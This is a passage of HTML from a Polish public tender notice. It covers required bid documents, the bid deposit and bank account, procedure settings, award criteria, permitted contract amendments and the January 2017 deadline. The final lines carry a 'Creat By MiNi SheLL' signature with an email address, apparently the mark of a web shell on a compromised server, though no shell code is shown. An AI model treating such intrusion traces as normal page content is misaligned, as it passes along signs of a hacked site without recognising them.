              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. WYPEŁNIONY  FORMULARZ  OFERTOWY  sporządzony na/wg  Załącznika  nr 1 do SIWZ;
2. W przypadku wniesienia WADIUM w formie innej niż pieniężna należy dołączyć dokument potwierdzający wniesienie wadium  do oferty; 
3. Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć PEŁNOMOCNICTWO(A) do działania w imieniu Wykonawcy (podpisanie oferty, reprezentowanie Wykonawcy, ewentualnie inne działania np. podpisanie umowy)  - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu Wykonawcy nie wynikają z innych złożonych  dokumentów;
4. ZOBOWIĄZANIE PODMIOTU/OSOBY udostępniającego(ej) Wykonawcy swoje zasoby sporządzone wg Załącznika nr 2c do SIWZ (wypełniają tylko podmioty, które udostępniają Wykonawcy swoje zasoby). Zobowiązanie należy dołączyć do w oryginale do oferty (jeżeli występuje);
5. OŚWIADCZENIE  WYKONAWCY sporządzone na/wg załącznika nr 2d lub 2e do SIWZ o przynależności albo braku przynależności do tej samej grupy kapitałowej. 
6. Harmonogram realizacji projektu wg załącznika nr 11
7. Wykaz część powierzonych podwykonawcom  załącznik nr 2f (jeśli dotyczy)
Uwaga!
1. Na podstawie art. 24 ust 11 ustawy oświadczenie o którym mowa w sekcji D pkt 5 Wykonawca  przekazuje Zamawiającemu w terminie 3 dni od zamieszczenia przez zamawiającego na stronie internetowej informacji dotyczących: kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia, firm oraz adresów wykonawców, którzy złożyli oferty w terminie, ceny, terminu wykonania zamówienia, okresów gwarancji i warunków płatności zawartych w ofertach.
2. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody (dokumenty lub informacje), że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia

E. DOKUMENTY PODMIOTÓW ZAGRANICZNYCH:
Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu wymienionego w sekcji B niniejszej SIWZ składa:
1) informację z właściwego rejestru albo w przypadku braku rejestru inny równoważny dokument wystawiony przez właściwy organ sądowy lub administracyjny kraju w którym wykonawca ma siedzibę ,
2) dokument  że nie zalega z opłacaniem podatków opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności  wraz z ewentualnymi odsetkami lub grzywnami , 
3) dokument nie otwarto jego likwidacji ani nie ogłoszono upadłości.  
Informacja i dokumenty  o których mowa w pkt.1 i 3  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a dokument o którym mowa w pkt.2  powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
Pozostałe oświadczenia/dokumenty wymagane w prowadzonym postępowaniu, Wykonawca mający siedzibę lub miejsce zamieszkania  poza terytorium Rzeczypospolitej Polskiej, składa takie same  jak Wykonawca polski.

Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (z zachowaniem terminu odpowiednio 3 lub 6 miesięcy przed terminem składania ofert).

Wszystkie dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.

DOKUMENTY NALEŻY SKŁADAĆ W FORMIE ORYGINAŁÓW LUB KSEROKOPII POŚWIADCZONEJ PRZEZ WYKONAWCĘ ZA ZGODNOŚĆ Z ORYGINAŁEM.

W przypadku podmiotów na zasobach, których Wykonawca polega na zasadach określonych w art. 22a ust 1 ustawy, kopie dokumentów dotyczących tych podmiotów poświadczają za zgodność z oryginałem te podmioty.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. WADIUM
1.	1. Wadium ustala się na kwotę: 100.000,00 zł.
2. Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia 12.01.2017r. do godz. 12:00. W przypadku wniesienia wadium w formie pieniężnej, za moment wniesienia wadium uznaje się moment uznania rachunku bankowego Zamawiającego.
3. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy, tj.:
 1) pieniądzu;
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
 3) gwarancjach bankowych;
 4) gwarancjach ubezpieczeniowych;
 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2016, poz. 359 z późn. zm.).
4. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego w : 
PKO BP S.A. I Oddział w Szczecinie
nr: 34 1020 4795 0000 9002 0122 0631.
z adnotacją: WADIUM  przetarg ozn. NP/IF/333/71/2016

1.	Dowód wniesienia wadium należy dołączyć do oferty.
2.	W przypadku wniesienia wadium w formie innej niż pieniężna  oryginał dokumentu potwierdzającego wniesienie wadium należy zdeponować w siedzibie Zamawiającego w Szczecinie, al. Wyzwolenia 105, przed upływem terminu składania ofert.
3.	Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i ust. 5 ustawy.
4.	Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zgodnie z zapisami ustawy zostanie wykluczony z prowadzonego postępowania, a jego oferta zostanie odrzucona.
5.	Zamawiający dokona zwrotu lub zatrzymania wadium zgodnie z art. 46 ustawy.

UWAGA! 
Stosownie do zapisów art. 46 ust. 4a ustawy Zamawiający Zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn   leżących po jego stronie, nie złoży  oświadczeń lub dokumentów, potwierdzających okoliczności o których mowa w art. 25 ust 1 oświadczenia o którym mowa w art. 25a ust 1, pełnomocnictw lub nie wyrazi zgody na poprawienie omyłki  o której mowa w art. 87 ust. 2 pkt 3, co spowoduje brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.   
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności, z zastrzeżeniem ograniczeń wynikających z art. 144 ustawy Prawo zamówień publicznych oraz niniejszej umowy.
2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2,3 i 4 oraz § 28 ust. 1 pkt 5.
3. Zamawiający dopuszcza możliwość istotnych zmian postanowień umowy zawartej z Wykonawcą w stosunku do treści oferty w formie aneksu do umowy w zakresie zmiany terminu realizacji zamówienia przed jego upływem z przyczyn niezależnych od Wykonawcy wskazanych przez Wykonawcę, a w szczególności przedłużenia terminu realizacji zamówienia na skutek zaistnienia okoliczności uniemożliwiających prowadzenie robót zgodnie z wymaganiami Zamawiającego, polegających na:
1. Przedłużeniu przez organ administracyjny prowadzonego postępowania lub wniesienia od wydanych orzeczeń środków zaskarżenia, które uniemożliwiają rozpoczęcie robót budowlanych,
2.	Warunkach pogodowych uniemożliwiających prowadzenie prac (przerwanie robót powinno być potwierdzone w dzienniku budowy przez Kierownika budowy i Inspektora nadzoru, a wydłużenie czasu na realizację robót może być maksymalnie równe ilości dni, podczas których roboty nie mogły być realizowane  informacja o wstrzymaniu i ponownym kontynuowaniu robót muszą zostać wpisane w dzienniku budowy),
3.	Konieczności wstrzymania prac wynikającej z decyzji, zaleceń, orzeczeń uprawnionych organów i sądów w zakresie ich właściwości, uniemożliwiających prowadzenie prac zgodnie z oczekiwaniami Zamawiającego, wynikających z okoliczności administracyjno  prawnych, a także zgłoszenia uzasadnionych roszczeń przez właścicieli nieruchomości objętych zakresem inwestycji,
4.	Zniszczeniu części wykonanych prac wynikającym z aktów wandalizmu lub nadzwyczajnych sił przyrody,
5.	Wydłużeniu terminów wynikających z konieczności dokonania niezbędnych zmian, wykonania dodatkowych prac czy też rozwiązań zamiennych, które nie były możliwe do przewidzenia w momencie podpisywania umowy, a są konieczne dla osiągnięcia efektu i funkcjonalności zamierzenia.
6.	Ujawnieniu niezgodności pomiędzy dokumentacją dostępną w ewidencjach lub rejestrach publicznych a rzeczywistym stanem, a niezgodność została ujawniona po podpisaniu umowy;
Wstrzymanie robót z wyżej wymienionych powodów musi być potwierdzone w dzienniku budowy i wymaga akceptacji inspektora nadzoru. Pisemny wniosek Wykonawcy w tej sprawie wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego, z zastrzeżeniem § 21 ust. 1,2,3 umowy.
4.Zamawiający dopuszcza również możliwość istotnych zmian postanowień umowy zawartej 
z Wykonawcą w stosunku do treści oferty w formie aneksu do umowy w zakresie:
1) osób sprawujących bezpośredni nadzór nad realizacją przedmiotu zamówienia (kierownika budowy, inspektora nadzoru inwestorskiego). Wniosek Wykonawcy w sprawie zmiany kierownika budowy wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego,
2)zmiana  podwykonawcy  wskazanego w ofercie udostępniającego zasoby lub rezygnacja z tego podwykonawcy, pod warunkiem że Wykonawca wykaże Zamawiającemu że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania ,  
3) powierzenia  podwykonawcy realizacji części zamówienia w sytuacji gdy  Wykonawca w ofercie zobowiązał się samodzielnie realizować zamówienie,
4) zmiany zakresu rzeczowego robót przewidzianych do realizacji przez Wykonawcę, o którym mowa w § 13 niniejszej umowy;
5) pozostałych postanowień umownych jeżeli okażą się niezbędne dla osiągniecia zamierzonego efektu umowy oraz wykonania jej przedmiotu. 
5.Warunkiem zmian, o których mowa w ust. 2, 3 i 4 będzie zaistnienie szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Wniosek w sprawie aneksu wymaga podania uzasadnienia oraz jego udowodnienia. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/01/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com